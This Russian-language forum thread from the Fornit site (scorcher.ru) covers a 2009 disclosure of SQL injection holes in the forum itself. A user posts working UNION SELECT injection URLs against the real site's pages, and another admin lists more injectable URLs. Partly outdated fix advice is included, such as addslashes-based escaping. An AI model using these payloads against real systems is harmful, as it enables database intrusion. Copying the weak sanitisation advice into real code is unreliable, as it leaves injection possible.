Главная книга сайта Форнит: «Мировоззрение». Другие книги:
«Познай себя», «Основы адаптологии», «Вне привычного» и Лекторий МВАП.
 
Привет! Правила | Свежее | Чат | Подписка
Чтобы оставлять сообщения нужно авторизоваться.
Авторизация пользователя
Регистрация нового пользователя

Тема форума: «Об автохрокинге»

Сообщений: 19 Просмотров: 18349 | Вся тема для печати
Страницы: 1 2
 
Namor
Имеет права полного администратора сайта - админ

Род: Мужской
Сообщений: 4


личная фото-галереясписок всех сообщений
clons
Сообщение № 240 показать отдельно Май 22, 2003, 01:12:35 AM
ответ -только после авторизации
Опять меня стёрли. :'(
Администрация, я буду жаловаться!

Хрюкинг - клёвая штука. Хочу себе такую-же на сайт, и обращаюсь с официальным запросом к корпорации Fornitsoft о возможности лицензирования этой технологии.

Я сначала думал что это такой способ отстрела неугодных юзеров (типа меня). А оказывается это способ суицида для них ???

Ну, в общем, хочу патент

Метка админа:

 
nan
Имеет права полного администратора сайта - админ

Род: Мужской
Сообщений: 11193


E-Mail
личная фото-галерея
Оценок: 39
список всех сообщений
clons
Сообщение № 246 показать отдельно Май 22, 2003, 08:57:32 AM
ответ -только после авторизации
Я тебя не стирал!!! Ты так и торчишь от 22 марта в регистрации Roman-ом! Пароль забыл? Могу напомнить, если хочешь в письме!
Насчет использования хрюкинга у тебя на сайте – никаких возражений. А нельзя ли попросить тебя в ответ сделать статейку для этого сайта о флеше в смысле программирования и т.д.?


p.s. Допускаю, что мое утверждение может быть порочно, поэтому прошу показывать, что именно и почему неверно и запрашивать объяснения, если что-то непонятно.
Метка админа:

 
Ласточка (гость)
список всех сообщений
clons
Сообщение № 291 показать отдельно Май 24, 2003, 10:41:08 PM
ответ -только после авторизации
Ну. товарищ Nan! И садист же ты! ;D Это я по поводу твоей системы автохрюка - способа повышения адреналина в крови на 5 минут для всех излишне любопытствующих 8) ;D

Метка админа:

 
xssql
Newbie


Сообщений: 5
!!! список всех сообщений
clons
Сообщение № 14297 показать отдельно Июнь 09, 2009, 02:00:55 PM
ответ -только после авторизации

Метка админа:

 
nan
Имеет права полного администратора сайта - админ

Род: Мужской
Сообщений: 11193


E-Mail
личная фото-галерея
Оценок: 39
список всех сообщений
clons
Сообщение № 14298 показать отдельно Июнь 09, 2009, 02:45:37 PM
ответ -только после авторизации

дешевая инъекция.. Нужно еще немало знать, чтобы навредить. Хотя бы именя таблиц. Ну а если кто-то сильно навредит, то в логах по его ip обращусь к провайдеру, найду голубчика о будет он сильно горевать в итоге. А сайт быстро восстановлю. Дырки всегда можно найти. Люди ходят по улице без шлемов и любой может кирпичем ударить.

А пароль шифрованный :)

Короче, каждый сам решает преступник он или нет. Воры, к примеру, в точности как хакеры, гордятся своим умением потрошить лохов. Хакер - ничем не лучше вора.

Но спасибо, исправил защиту...



p.s. Допускаю, что мое утверждение может быть порочно, поэтому прошу показывать, что именно и почему неверно и запрашивать объяснения, если что-то непонятно.
Метка админа:

 
xssql
Newbie


Сообщений: 5
!!! список всех сообщений
clons
Сообщение № 14300 показать отдельно Июнь 09, 2009, 03:24:35 PM
ответ -только после авторизации
ух как срашно )) давай, юзай, айпиха есть, я даже не через проксю юзал индж ))


http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UNION/**/SELECT/**/0,concat_Ws(0x0b,table_name,column_name),2,3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+0,1

Перебирай лимитом все свои таблицы ))

хотел бы навредить, поверь уже давно это сделал бы и тем более для тебя не кинул бы чтобы ты её латал ))

"дешевая инъекция"
а какая еще есть не дешевая индж?

http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UnION/**/SELECT/**/0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9


чел то что ты фильтр кинул тебе не поможет ))

Надо сделать следующее

if !is_numeric($_POST['id']) die('fuck off');


также когда не цифровое значение

$id=addslashes($id);
$id=htmlspecialchars($id);
mysql_query(SELECT * FROM WHERE myid='$id');

обьязательно в запросах ставь ' и слешируй удачи

Метка админа:

 
nan
Имеет права полного администратора сайта - админ

Род: Мужской
Сообщений: 11193


E-Mail
личная фото-галерея
Оценок: 39
список всех сообщений
clons
Сообщение № 14301 показать отдельно Июнь 09, 2009, 03:44:52 PM
ответ -только после авторизации

все, сибо еще разок :) а че ты такой агрессивный?

 



p.s. Допускаю, что мое утверждение может быть порочно, поэтому прошу показывать, что именно и почему неверно и запрашивать объяснения, если что-то непонятно.
Метка админа:

 
xssql
Newbie


Сообщений: 5
!!! список всех сообщений
clons
Сообщение № 14309 показать отдельно Июнь 09, 2009, 06:56:38 PM
ответ -только после авторизации
с чего ты взял что я агрессивный )) я споконый как доска )) лан, кильни мой акк с сайта чтобы на мыло мессаги не приходили и проверь все переменные

Метка админа:

 
xssql
Newbie


Сообщений: 5
!!! список всех сообщений
clons
Сообщение № 14310 показать отдельно Июнь 09, 2009, 06:58:19 PM
ответ -только после авторизации
в этой теме ввел что надо тож есть баги, исправляй, подставляй ' там где цифры, буш баги видеть

Метка админа:

 
Айк
Имеет права полного администратора сайта - админ

Сообщений: 3658
!!!
личная фото-галерея
Оценок: 4
список всех сообщений
clons
Туда же

http://scorcher.ru/journal/show_news.php?id='
http://scorcher.ru/forum/index.php?board=7&action=display&threadid='&start=30

Как вариант, есть проги вроде xspider. Можно поставить копию сайта на локальную виртуальную машину и проверить с помощью сканера.

Для функции mysql_query можно написать функцию обёртки, которая бы фильтровала запросы к БД и одновременно делала лог запросов, которые вызвали ошибку. Это самый простой, хоть и самый ненадёжный способ.

Вторая вариация дубовых способов: фильтровать все GET/POST запросы на моменте первого обращения к PHP коду. Поскольку переменных, которые изменяются извне не так уж много, написать такой фильтр несложно и достаточно вставить его в одном месте, например config.php (setting.php) файле, лишь бы этот файл обязательно подключался к скриптам в самом начале.

О дырах форума можно подробнее узнать по ссылке:

securityvulns.ru

В поиске ввести: "Yabb SE SQL Injection" или "Yabb SE exploit", "Yabb SE xss"

Дабы не своровали FTP пароли, пока будешь лазить по таким сайтам, нужно установить Avira ( http://free-av.com ) и усердно молится
« Последнее редактирование: 2009-06-10 00:06:31 Синь »

Метка админа:

 
oleg89
Пишет без ограничений, редактирует историю - unlimited

Род: Мужской
Сообщений: 63

список всех сообщений
clons
Сообщение № 14322 показать отдельно Июнь 10, 2009, 01:34:26 AM
ответ -только после авторизации
удивляюсь нану - успевает и машеников разоблачать и хацкеров!
и все один! помог бы кто, только обижают... он и так ради нас балбесов старается!

Метка админа:

 
Айк
Имеет права полного администратора сайта - админ

Сообщений: 3658
!!!
личная фото-галерея
Оценок: 4
список всех сообщений
clons
На самом деле современная версия этого движка ( YaBB SE ==> SMF ) куда более устойчива ко взлому. Такого рода проблем там нет.

Метка админа:

 
nan
Имеет права полного администратора сайта - админ

Род: Мужской
Сообщений: 11193


E-Mail
личная фото-галерея
Оценок: 39
список всех сообщений
clons
Сообщение № 14332 показать отдельно Июнь 10, 2009, 05:41:58 PM
ответ -только после авторизации

Спасибо всем поучаствовавшим и посочувствовавшим :)

форум написан с нуля, в нем нет ничего от Yabb кроме намеков :) только движок расширенного редактора - не мой.



p.s. Допускаю, что мое утверждение может быть порочно, поэтому прошу показывать, что именно и почему неверно и запрашивать объяснения, если что-то непонятно.
Метка админа:

 
xssql
Newbie


Сообщений: 5
!!! список всех сообщений
clons
Сообщение № 14333 показать отдельно Июнь 10, 2009, 06:38:48 PM
ответ -только после авторизации
"удивляюсь нану - успевает и машеников разоблачать и хацкеров"

я думаю если бы я индж не выложил врядли бы он узнал

Метка админа:

 
oleg89
Пишет без ограничений, редактирует историю - unlimited

Род: Мужской
Сообщений: 63

список всех сообщений
clons
Сообщение № 14334 показать отдельно Июнь 10, 2009, 07:00:11 PM
ответ -только после авторизации
я думаю если бы я индж не выложил врядли бы он узнал


не узнал бы, и в чем прикол?

Вообще не вижу смысла ломать этот сайт. Он даже толком не раскручен...

Метка админа:

 
Страницы: 1 2
Статистика:
Всего Тем: 1887 Всего Сообщений: 45888 Всего Участников: 4762 Последний зарегистрировавшийся: hlo
Страница статистики форума | Список пользователей | Список анлимитов
Последняя из новостей:
Футуристическая фантастика: Слава и первая смерть.
Все новости

Ученые выяснили, почему в мозгу рождаются мысли и можно ли прожить без них
Язык связывает различные когнитивные функции, которые без него существуют отдельно.
Все статьи журнала
Пользователи на форуме:

Из коллекции изречений:
>>показать еще...

Яндекс.Метрика